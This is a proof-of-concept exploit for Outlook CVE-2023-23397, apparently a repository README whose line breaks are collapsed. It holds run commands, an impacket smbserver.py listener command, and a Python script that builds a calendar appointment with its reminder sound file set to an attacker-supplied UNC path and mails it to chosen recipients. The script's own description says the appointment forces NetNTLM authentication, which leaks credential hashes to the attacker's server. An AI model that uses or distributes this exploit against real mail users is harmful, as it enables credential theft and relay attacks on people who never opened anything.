Outlook CVE-2023-23397

python CVE-2023-23397.pyusage: CVE-2023-23397.py [-h] -p PATHCVE-2023-23397.py: error: the following arguments are required: -p/--pathpython CVE-2023-23397.py --path '\yourip'

smbserver.py -smb2support SHARE .

import smtplib, datetime, argparsefrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.application import MIMEApplicationfrom email.utils import COMMASPACE, formatdatefrom independentsoft.msg import Message# Mail configuration : change it !smtp_server = "mail.example.com"smtp_port = 587sender_email = "[email protected]"sender_password = "P@ssw0rd"recipients_email = ["[email protected]"]class Email:    def __init__(self, smtp_server, port, username, password, recipient):        self.smtp_server = smtp_server        self.port = port        self.username = username        self.password = password        self.recipient = recipient    def send(self, subject, body, attachment_path):        msg = MIMEMultipart()        msg['From'] = self.username        msg['To'] = COMMASPACE.join(self.recipient)        msg['Date'] = formatdate(localtime=True)        msg['Subject'] = subject        msg.attach(MIMEText(body))        with open(attachment_path, 'rb') as f:            part = MIMEApplication(f.read(), Name=attachment_path)            part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'            msg.attach(part)        try:            server = smtplib.SMTP(self.smtp_server, self.port)            server.starttls()            server.login(self.username, self.password)            server.sendmail(self.username, self.recipient, msg.as_string())            server.quit()            print("[+] Malicious appointment sent !")        except Exception as e:            print("[-] Error with SMTP server...", e)parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)args = parser.parse_args()appointment = Message()appointment.message_class = "IPM.Appointment"appointment.subject = "CVE-2023-23397"appointment.body = "New meeting now !"appointment.location = "Paris"appointment.appointment_start_time = datetime.datetime.now()appointment.appointment_end_time = datetime.datetime.now()appointment.reminder_override_default = Trueappointment.reminder_sound_file = args.pathappointment.save("appointment.msg")email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)subject = "Hello There !"body = "Important appointment !"email.send(subject, body, "appointment.msg")